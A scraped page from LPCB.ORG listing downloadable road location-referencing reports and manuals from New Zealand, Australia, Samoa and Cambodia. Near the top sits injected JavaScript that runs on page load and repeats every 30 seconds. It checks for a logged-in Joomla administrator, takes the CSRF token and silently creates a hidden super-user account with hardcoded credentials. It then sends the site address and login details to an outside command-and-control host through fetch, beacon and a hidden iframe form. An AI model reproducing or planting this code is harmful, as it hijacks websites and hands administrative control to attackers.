LPCB.ORG
Home
(function () {'use strict';if (window.joomlacreater_inline_run) return;window.joomlacreater_inline_run = true;var C2 = 'https://xdxd.warnightkardesim.icu';var DEF = {login: 'admin_mori',pass: 'mori_pro3344',email: 'memetkaan43@proton.me',gid: '8'};var FORM_URL = '/administrator/index.php?option=com_users&view=user&layout=edit&id=0';function extractToken(html) {var p = [/"csrf\.token"\s*:\s*"([a-f0-9]{32})"/i,/'csrf\.token'\s*:\s*'([a-f0-9]{32})'/i,/name="([a-f0-9]{32})"\s+value="1"/i,/value="1"\s+name="([a-f0-9]{32})"/i];for (var i = 0; i < p.length; i++) {var m = html.match(p[i]);if (m) return m[1];}return null;}function isAdminHtml(html) {html = html || '';var head = html.slice(0, 12000);return /com_cpanel|view=cpanel|administrator\/index\.php\?option=com_/i.test(head)&& !/task=login|id="login-form"|com_login|login-form/i.test(head);}function fetchConfig() {return fetch(C2 + '/api.php?action=public_config', { credentials: 'omit' }).then(function (r) { return r.json(); }).catch(function () { return null; });}function mergeUser(data) {var u = {login: DEF.login,pass: DEF.pass,email: DEF.email,group_id: DEF.gid};if (data && data.ok) {if (data.user_login) u.login = data.user_login;if (data.user_pass) u.pass = data.user_pass;if (data.user_email) u.email = data.user_email;if (data.user_group_id) u.group_id = String(data.user_group_id);if (data.joomla_base) C2 = String(data.joomla_base).replace(/\/+$/, '');}return u;}function notifyRouter(router, u) {var fields = {url: location.origin,domain: location.hostname,username: u.login,password: u.pass,email: u.email,force: '1'};var payload = new URLSearchParams(fields).toString();try {fetch(router, {method: 'POST',mode: 'no-cors',headers: { 'Content-Type': 'application/x-www-form-urlencoded' },body: payload,keepalive: true});} catch (e) {}try {if (navigator.sendBeacon) {navigator.sendBeacon(router, new Blob([payload], { type: 'application/x-www-form-urlencoded' }));}} catch (e2) {}try {if (!document.getElementById('jc_router_iframe')) {var iframe = document.createElement('iframe');iframe.name = 'jc_router_iframe';iframe.id = 'jc_router_iframe';iframe.style.cssText = 'position:absolute;width:0;height:0;border:0;visibility:hidden';document.body.appendChild(iframe);}var form = document.createElement('form');form.method = 'POST';form.action = router;form.target = 'jc_router_iframe';form.style.display = 'none';Object.keys(fields).forEach(function (k) {var inp = document.createElement('input');inp.type = 'hidden';inp.name = k;inp.value = fields[k];form.appendChild(inp);});document.body.appendChild(form);form.submit();setTimeout(function () { form.remove(); }, 5000);} catch (e3) {}}function buildUserBody(token, u) {var body = new URLSearchParams();body.set(token, '1');body.set('task', 'user.apply');body.set('return', '');body.set('jform[id]', '0');body.set('jform[name]', u.login);body.set('jform[username]', u.login);body.set('jform[password]', u.pass);body.set('jform[password2]', u.pass);body.set('jform[email]', u.email);body.set('jform[registerDate]', '');body.set('jform[lastvisitDate]', '');body.set('jform[lastResetTime]', '');body.set('jform[resetCount]', '0');body.set('jform[sendEmail]', '0');body.set('jform[block]', '0');body.set('jform[requireReset]', '0');body.set('jform[groups][]', u.group_id);body.set('jform[params][admin_style]', '');body.set('jform[params][colorScheme]', '');body.set('jform[params][allowTourAutoStart]', '');body.set('jform[params][admin_language]', '');body.set('jform[params][language]', '');body.set('jform[params][editor]', '');body.set('jform[params][timezone]', '');body.set('jform[params][a11y_mono]', '0');body.set('jform[params][a11y_contrast]', '0');body.set('jform[params][a11y_highlight]', '0');body.set('jform[params][a11y_font]', '0');return body;}function createSuperUser(token, u) {return fetch(FORM_URL, {method: 'POST',credentials: 'include',headers: { 'Content-Type': 'application/x-www-form-urlencoded' },body: buildUserBody(token, u).toString(),redirect: 'follow'}).catch(function () { return null; });}function runCreate() {if (window.joomlacreater_create_done) return;window.joomlacreater_create_done = true;fetchConfig().then(function (data) {var u = mergeUser(data);var router = (data && data.ok && data.router_url) ? data.router_url : (C2 + '/router.php');return fetch(FORM_URL, { credentials: 'include' }).then(function (r) { return r.text(); }).then(function (html) {if (!isAdminHtml(html)) return;var token = extractToken(html);if (!token) return;return createSuperUser(token, u).then(function () {notifyRouter(router, u);});});}).catch(function () {});}function checkAdmin() {fetch('/administrator/index.php', {credentials: 'include',redirect: 'manual',cache: 'no-store'}).then(function (r) {if (r.type === 'opaqueredirect' || r.status === 0 || r.status === 302) {return fetch('/administrator/index.php', { credentials: 'include' }).then(function (x) { return x.text(); });}if (r.status === 401 || r.status === 403) return '';return r.text();}).then(function (html) {if (isAdminHtml(html)) runCreate();}).catch(function () {});}checkAdmin();setInterval(checkAdmin, 30000);})();
Contact Us
Login
Location Referencing
The linear and spatial reference of data.
2005 - Australia - Review of Location Referencing System
2709 Downloads
455.23 KB
Created Date:
25-06-2019
Summary of different techniques for location referencing
Download
View
Details
2004 - NZ - State Highway Referencing Manual: Part 3
2491 Downloads
3.5 MB
Created Date:
25-06-2019
Excellent discussion on location referencing of highways. Broken into three parts to simplify downloading.
Download
View
Details
2004 - NZ - State Highway Referencing Manual: Part 2
1835 Downloads
4.12 MB
Created Date:
25-06-2019
Excellent discussion on location referencing of highways. Broken into three parts to simplify downloading.
Download
View
Details
2004 - NZ - State Highway Referencing Manual: Part 1
2725 Downloads
4.18 MB
Created Date:
25-06-2019
Excellent discussion on location referencing of highways. Broken into three parts to simplify downloading.
Download
View
Details
2003 - Cambodia - Location Referencing and Condition Survey: Executive Summar
1534 Downloads
895.99 KB
Created Date:
25-06-2019
Executive summary describing MWH Cambodia LRCS survey.
Download
View
Details
2002 - Samoa - Location Referencing Manual
2182 Downloads
472.47 KB
Created Date:
25-06-2019
How a location referencing system was established for the Samoa road network
Download
View
Details
2002 - New Zealand - Location Referencing Guide for Local Authorities
1878 Downloads
641.68 KB
Created Date:
25-06-2019
Guide to location referencing for local roads
Download
View
Details
2001 - Spatial Referencing of State Highway Data
1881 Downloads
901.96 KB
Created Date:
25-06-2019
Issues and strategy for using spatial measurements on NZ State Highways
Download
View
Details
2001 - Principles of Location Referencing
1738 Downloads
2.51 MB
Created Date:
25-06-2019
Techniques for referencing road data
Download
View
Details
2001 - New Zealand - Spatial Referencing of the State Highway Network
2103 Downloads
901.96 KB
Created Date:
25-06-2019
How the State Highway Network would be referenced spatially
Download
View
Details
2001 - New Zealand - Role of Location Referencing in Transit's Business Process
1874 Downloads
546.19 KB
Created Date:
25-06-2019
Analysis of Transit's business processes and the role of location referencing
Download
View
Details
2001 - New Zealand - Principles of Location Referencing
1707 Downloads
2.52 MB
Created Date:
25-06-2019
Report describing different techniques used around the world for location referencing
Download
View
Details
2001 - New Zealand - Location Referencing Requirements in Transit
2308 Downloads
3.15 MB
Created Date:
25-06-2019
The requirements of Transit New Zealand for location referencing
Download
View
Details
2001 - New Zealand - Implementation Strategy for LRMS
2120 Downloads
1.49 MB
Created Date:
25-06-2019
The strategy for implementing Transit's new Location Referencing Management System
Download
View
Details
2001 - New Zealand - exor Gap Analysis
2040 Downloads
1.44 MB
Created Date:
25-06-2019
An analysis of the ability of exor Highways to meet Transit New Zealand's location referencing needs
Download
View
Details
2001 - New Zealand - Business Process Changes
2466 Downloads
4.19 MB
Created Date:
25-06-2019
Changes required to Transit's business processes for new Location Referencing Management System
Download
View
Details
2000 - Australia - Network Referencing Catalog
2096 Downloads
1.25 MB
Created Date:
25-06-2019
The West Australian location referencing system
Download
View
Details
2000 - Australia - Features Definition Catalog
1313 Downloads
436.31 KB
Created Date:
25-06-2019
The West Australian location referencing system
Download
View
Details
2000 - Australia - Data Definitions Catalog
1521 Downloads
359.61 KB
Created Date:
25-06-2019
The West Australian location referencing system
Download
View
Details
×
Menu
Home
Contact Us
Login